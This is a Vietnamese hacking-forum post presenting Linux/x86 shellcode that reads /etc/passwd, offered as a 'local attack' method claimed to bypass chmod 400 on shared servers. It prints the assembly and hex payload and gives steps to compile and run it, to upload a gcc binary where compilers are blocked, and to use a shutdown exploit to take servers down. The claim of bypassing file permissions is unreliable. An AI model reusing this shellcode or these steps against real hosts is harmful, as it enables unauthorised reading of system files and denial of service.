• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

[New method] Local (it can bypass chmod 400)

Admin

Well-Known Member
Staff member
Administrator
Ta dùng em này nhé Linux/x86 - File Reader /etc/passwd - 65 bytes
PHP:
/*
Linux/x86 file reader.
65 bytes   pathname
Author: certaindeath
Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two
one:
pop %ebx
movb $5, %al
xor %ecx, %ecx
int $0x80
mov %eax, %esi
jmp read
exit:
movb $1, %al
xor %ebx, %ebx
int $0x80
read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80
xor %ebx, %ebx
cmp %eax, %ebx
je exit
movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80
add $1, %esp
jmp read
two:
call one
.string "file_name"
*/
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"/etc/passwd"; //Put here the file path, default is /etc/passwd
Shellcode này giúp chúng ta view đc file bất kì khi sử dụng và thay đổi path /etc/passwd thành path cần view thôi.
Cách thực hiện.
Save dưới dạng file exploit.c
Sau đó compile lại bằng lệnh
gcc -o exploit exploit.c Trông như get root vậy
Sau đó sẽ xuất hiện file exploit
Nâng file đấy lên thành 777.Dùng lệnh
PHP:
Chmod  x exploit
Và cuối cùng là
./exploit Kết quả là ta đọc đc file /etc/passwd
Rất giống getroot phải ko
Cách thực hiện rất dễ.
Nhiều server cấm lệnh gcc thì bạn có thể dùng file gcc ở1 server linux nào đó.Máy ảo chẳng hạn.Up lên rồi chmod 777 rồi ./gcc để thực hiện lệnh....
Download gcc gcc.zip
Ngoài ra các bạn có thể làm tắt server bằng file exploit sau đây.
Linux/x86 - Shutdown computer - 51 bytes
done.
 

Facebook Comments

Similar threads
Thread starter Title Forum Replies Date
Admin Hướng dẫn kiếm 100$ mỗi ngày - Method earn $100 dollar per day Tut, tool, mmo 4
Admin Hướng dẫn fix lỗi please enter a valid callback method cho xenforo Xenforo 0
T Hướng dẫn làm việc local repo và remote repo trong Git Tin tức CNTT 0
G Help ai chỉ em cách local attack vs Local attack 0
C Phương pháp chống local attack ! Chống local, attack, symlink, ddos 0
C Mẹo Chống Ddos, Local Attack Chống local, attack, symlink, ddos 0
Admin 10 thủ thuật local seo Thảo luận SEO 0
Hero Share TUT Local Full 2012 Tut, tool, mmo 6
V Share Tư duy local cơ bản Hacking 0
V Tư duy Local Nâng Cao (Hạ Safemode) Hacking 0
T Hướng dẫn chmod chống local Johncms 2
X Hướng dẫn Cài local host với XAMPP Hosting / Domain 0
Admin Tìm user của victim khi local Local attack 0
H Blog - Vũ khí bí mật cho Local SEO Xem thêm: Blog - Vũ khí bí mật cho Local SEO Cộng đồng Diễn Đàn Thảo luận SEO 0
Myshare Hướng dẫn Chmod Chống Local Attack Bảo mật 0
Admin Local apache cho newbie Local attack 1
Admin Tut local căn bản cho newbie Local attack 2
Admin [Tool] Local Attack Server Linux Tut, tool, mmo 0
K KShell 1.2 công cụ không thể thiếu khi local server window Local attack 0
K Kỹ thuật sử dụng shell/remote local Lan Local attack 0
Admin Các câu lệnh sử dụng Shell và cách khắc phục sự cố không local được Local attack 0
Admin Bảo mật chống local attack server linux Bảo mật 3
V Shell local nè a.e Security - Local - Hacking 22
Admin Full hạn chế local, attack Chống local, attack, symlink, ddos 0
Admin Hạn chế local attack cho vbb Chống local, attack, symlink, ddos 0
Admin Thông báo Forum đang chạy trên server mới, chống 100% local và ddos, tốc độ load nhanh Thông báo mới 32
Admin [Tut] bảo mật website chống local, att tốt cơ bản và nâng cao Chống local, attack, symlink, ddos 98
Admin [Local attack] làm gì khi safe_mode: ON Local attack 0
Admin Hướng dẫn local attack, symlink từ a đến z Local attack 5
Admin [SHARE] Code Reverse IP - Lợi Cho Local Attack Security - Local - Hacking 0
Admin Hạn chế local attach Vbulletin 0
Admin Hướng dẫn chi tiết cách bảo mật tối đa cho website/forum tránh 99% nguy cơ bị Local Vbulletin 2
Admin 1 vai video local Thảo luận wap việt 0
Admin Tut SQL + up shell +local (tổng hợp) Thảo luận wap việt 3
Admin 403 forbidden and cant read /etc/named.conf error bypass Tut, tool, mmo 2
Admin [Tut] sql bypass 406 cực cơ bản cho newbie Tut, tool, mmo 0
Admin [Tut] bypass admin cpanel Tut, tool, mmo 0
Admin Tool bypass antivirus cho keylog, trojan Sử dụng, chia sẻ, hỏi đáp 2
S Bypass là gì? Security - Local - Hacking 5
Admin Tut bypass access denied Security - Local - Hacking 1

Similar threads

New posts New threads New resources

Back
Top